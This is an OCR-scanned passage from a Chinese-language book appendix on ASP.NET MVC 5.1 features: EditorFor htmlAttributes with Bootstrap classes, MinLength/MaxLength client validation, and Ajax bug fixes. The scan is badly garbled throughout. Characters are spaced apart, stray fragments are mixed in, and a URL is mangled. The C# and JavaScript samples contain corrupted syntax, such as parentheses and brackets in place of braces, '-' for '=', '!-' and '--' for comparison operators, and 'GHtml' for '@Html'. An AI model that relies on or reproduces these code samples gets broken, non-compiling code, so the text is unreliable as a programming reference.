可 以 编写 自 定义 模板 以 重 写 所 有 默认 模板 。 
可 以 自己 放弃 使 用 Bootstrap 类 和 样式 事务 


. e 
D) n 
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在 5.1 的 发 布 版 本 中 ， 我 们 现在 可 以 把 HIML 特 性 作为 一 个 额外 的 参数 传送 给 
Html.EditorFor。 这 就 允许 我 们 在 保留 模板 编辑 器 所 有 优势 的 同时 应 用 自 定义 的 Bootstrap 样 
式 。 下 面 是 一 个 例子 ， 说 明了 为 什么 这 样 是 有 用 的 。 

在 附录 A 的 A.2 节 中 , 我 们 基 架 了 一 个 简单 的 Create 控 制 器 及 其 相关 视图 。Create 视 图 最 
终 运行 ， 如 图 A-11 所 示 。 


Salutation @Mr C Ms. OMs OD. O Prof. OSr C Lady O Lord 
meam [ | 
LastName 
Age 
Create 
图 A-11 


很 好 ， 但 Create 视 图 没有 应 用 任何 Bootstrap 表 单 样 式 ， 例 如 ， 聚 焦 指 示 (focus indication). 
元 素 大 小 (element sizing) 和 分 组 等 ， 也 没有 利用 自 定义 Bootstrap 主 题 做 什么 特别 的 事情 。 一 个 
伟大 的 开始 只 是 在 表单 元 素 中 添加 “form-control” 类 。 代 码 从 如 下 形式 : 


GHtml.EditorFor(model -»model.FirstName) 
变 为 : 


@Html .EditorFor (model -»model.FirstName, 
new ( htmlAttributes = new { @class = "form-control" }, }) 


当 对 文本 框 做 同样 更 新 之 后 ， 我 们 就 可 以 得 到 如 图 A-12 所 示 的 视图 。 


Create 


Person 


SalutGaion — & Mr. OMs OMs ODr OProt O Sir O Lady O Lord 


FirstName 
LastName 


mo [ 


图 A-12 


现在 我 们 应 该 注意 到 一 些 细微 的 改善 ， 比 如 FirstName 字 段 的 焦点 高 亮 ，Age 字 段 适中 的 
文本 框 大 小 和 验证 布局 等 。 这 些 只 是 基本 模型 具有 的 简单 功能 ， 但 它们 给 出 了 各 种 改善 的 快 
速 浏览 。 

此 外 ， 当 显示 整个 模型 时 ， 我 们 可 以 传送 Html.EditorFor 上 的 特性 。 下 面 的 代码 更 新 了 整 
个 表单 节 ， 但 只 使 用 了 一 次 EditorFor 调 用 ， 传 递 到 模型 中 : 

(using (Html.BeginForm()) 


t 
QHtml.AntiForgeryToken() 


附录 A ASPNET MVC 5.1 


«div class="form-horizontal"> 
<h4>Person</h4> 
<hr /> 
GHtml.ValidationSummary (true) 
GHtml.EditorFor (model => model, 
new ( htmlAttributes = new ( eclass = "form-control" ], ]) 
«div class-"form-group"» 
«div class-"col-md-offset-2 col-md-10"» 
«input type-"submit" value-"Create" 
class="btn btn-default" /> 
«/div» 
«/div» 
«/div» 
} 


为 了 确保 Id 属性 不 显示 ， 同 时 使 用 自 定义 单 选 枚 举 显示 模板 (如 A.2 节 所 述 )， 下 面 的 代码 
给 模型 添加 了 两 个 注解 。 模 型 及 其 相关 枚 举 如 下 所 示 : 


public class Person 
{ 


[ScaffoldColumn(false)] 
public int Id ( get; set; } 
[UIHint ("Enum-radio")] 
public Salutation Salutation ( get; set; ) 
public string FirstName ( get; set; } 
public string LastName ( get; set; ) 
public int Age ( get; set; ) 
) 
//I guess technically these are called honorifics 
public enum Salutation : byte 
t 


[Display (Name = "Mr.")] Mr, 
[Display(Name - "Mrs.")] Mrs, 
[Display (Name = "Ms.")] Ms, 
[Display (Name = "Dr.")] Doctor, 
[Display (Name = "Prof.")] Professor, 
Sir, 

Lady, 

Lord 


) 

这 样 就 会 得 到 与 图 A-12 一 样 的 输出 。 酷 的 地 方 是 EditorFor 方 法 把 form-control 类 传送 给 表 
单 中 的 每 一 个 元 素 ， 所 以 每 个 输入 标签 都 能 获取 form-control 类 。 这 样 就 可 以 在 同样 的 调用 中 
应 用 额外 的 Bootstrap 类 和 自 定 义 类 ， 代 码 如 下 : 


QHtml .EditorFor (model => model, new { htmlAttributes = 
new { @class = "form-control input-sm my-custom-class" }, }) 


A.4.2 MinLength 和 MaxLength 的 客户 端 验证 


MVC 5.1 现 在 为 MinLength 和 MaxLength 特 性 提供 了 客户 端 验证 支持 。 之 前 我 们 有 
StringLength 的 客户 端 验证 , 但 没有 MinLength 和 MaxLength 特 性 的 客户 端 验 证 。 就 个 人 观点 而 
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言 ， 笔 者 觉得 这 两 种 方法 明显 优 于 StringLength， 尽 管 StringLength 让 用 户 设置 最 小 和 最 大 值 ， 
并 获得 更 广泛 的 支持 ， 但 是 MinLength 和 MaxLength 人 允许 我 们 分 开 指 定 最 大 和 最 小 长 度 ， 并 分 
别 给 出 不 同 的 验证 信息 。 不 管 怎样 ， 好 消息 是 ， 无 论 使 用 哪个 方法 ， 它 们 都 能 在 服务 器 端 和 
客户 端 获得 支持 。 

为 了 进行 测试 ， 需 要 在 Person 类 中 添加 一 些 MinLength 和 MaxLength 特 性 。 


public class Person 
{ 
[ScaffoldColumn (false)] 
public int Id { get; set; } 
[UIHint ("Enum-radio")] 
public Salutation Salutation { get; set; } 
[Display (Name = "First Name")] 
[MinLength (3, ErrorMessage = 
"Your {0} must be at least {1} characters long")] 
[MaxLength (100, ErrorMessage = 
"Your {0} must be no more than {1} characters")] 
public string FirstName { get; set; } 
[Display (Name = "Last Name")] 
[MinLength(3, ErrorMessage = 
"Your (0) must be at least (1) characters long")] 
[MaxLength(100, ErrorMessage = 
"Your (0) must be no more than (1) characters")] 
public string LastName ( get; set; ) 
public int Age ( get; set; ) 
) 


当 网 站 用 户 输入 潜在 的 名 称 时 ， 可 以 得 到 及 时 的 反馈 ， 如 图 A-13 所 示 。 


| The Age field is required. 


图 A-13 


A.4.3 对 MVC Ajax 支持 小 而 有 用 的 修正 


MVC 5.1 包 含 一 些 针 对 MVC Ajax 表单 的 bug 修 复 : 

e 对 Ajax 操作 /表单 支持 “this” 上 下 文 。 

e Unobtrusive.Ajax 不 再 与 验证 上 的 取消 约定 冲突 。 

e LoadingElementDuration 之 前 不 起 作用 ， 现 在 已 经 矫正 。 


对 Ajax 操作 /表单 支持 “this” 上 下 文 
第 一 个 修复 允许 从 非 侵 入 式 Ajax 回调 来 访问 最 初 的 元 素 。 当 有 多 个 可 能 的 调用 者 时 ， 这 
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是 非常 方便 的 ， 例如， 一 个 包含 Ajax.ActionLink 调 用 的 项 目 列表 。 在 过 去 ， 笔 者 编写 过 不 必 
复杂 的 JavaScript 来 手动 关联 调用 ， 因 为 当时 不 能 利用 OnBegin、OnComplete、OnFailure 和 
OnSuccess 选 项 。 例 如 : 


<script type-"text/javascript"» 
$(function () ( 
// Document.ready -» link up remove event handler 
$(".RemoveLink").click(function () ( 
// Get the id from the link 
var recordToDelete - $(this).attr("data-id"); 
if (recordToDelete !- '') ( 
// Perform the ajax post 
$.post("/ShoppingCart/RemoveFromCart", 
("id": recordToDelete ], 
function (data) ( 
// Successful requests get here 
// Update the page elements 
if (data.ItemCount -- 0) ( 
$('£row-' + data.DeleteId) 
-fadeOut('slow'); 
) else ( 
$('fitem-count-' + data.DeleteId) 
.text (data.ItemCount); 


) 
$('£cart-total').text(data.CartTotal); 
S('£update-message').text (data.Message) ; 
S$('4cart-status') 
.text('Cart (' 
+ data.CartCount + ')'); 


2E 
</script> 
由 于 非 侵入 式 Ajax 支 持 “this” 上 下 文 ， 因 此 笔者 有 关联 Ajax 调用 的 选项 ， 可 以 实现 简洁 
地 分 开 回 调 函数 ， 因 为 它们 可 以 根据 ID 访问 调用 元 素 。 
这 个 bug 的 修复 历史 也 是 非常 有 趣 的 。 出 现在 StackOverflow 上 的 一 个 问题 ， 在 CodePlex 


上 有 人 发 布 并 建议 单行 修复 , 还 在 源码 提交 中 修复 了 bug, 网 址 为 http://aspnetwebstack.codeplex. 


com/SourceControl/changeset/8a2c969ab6b41591e6a7194028b5b37a562c855a.. 
Unobtrusive.Ajax 对 验证 上 取消 约定 支持 


jQuery 验证 支持 取消 约定 ， 即 拥有 class="cancel" 的 按钮 不 会 导致 验证 。 在 此 之 前 ， 非 侵入 
式 Ajax 与 这 个 行为 冲突 ， 因 此 ， 如 果 表 单 使 用 Ajax.BeginForm 创 建 ， 取 消 按钮 将 会 触发 验证 。 


LoadingElementDuration 支持 


MVC 3 包含 作为 AjaxOption 传 送 的 参数 LoadingElementDuration， 它 与 LoadingElementId 
共同 为 需要 显示 时 间 的 Ajax 表单 展示 消息 。 然 而 ， 这 个 元 素 被 不 正确 地 作为 字符 串 传递 给 
jQuery 而 不 是 作为 整数 ， 因 此 ， 元 素 总 是 使 用 默认 的 400 毫 秒 持续 显示 ， 这 个 bug 在 MVC 5.1 
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中 已 经 修复 。 
这 三 个 修复 都 比较 小 一 一 事实 上 ， 其 中 的 两 个 修复 都 只 是 修改 了 一 行 代码 一 一 但 是 对 于 
使 用 MVC Ajax 表 单 的 开发 人 员 来 说 是 绝对 有 用 的 。 


A.5 小 结 


本 附录 回顾 了 MVC 5.1 的 一 些 主要 功能 。 需 要 提醒 的 是 ， 如 果 需 要 ， 可 以 获取 这 些 样 例 
的 源码 ， 以 及 其 他 一 些 能 展示 Web API 2.1 功 能 的 样 例 ， 网 址 为 https:github.conyjongalloway/ 
StarDotOne. 此 外 , 还 有 ASPNET 资 源 库 中 的 官方 ASPNET/ Web API 样 例 , 网 址 为 http://aspnet. 
codeplex.com/sourcecontrol/latest。 


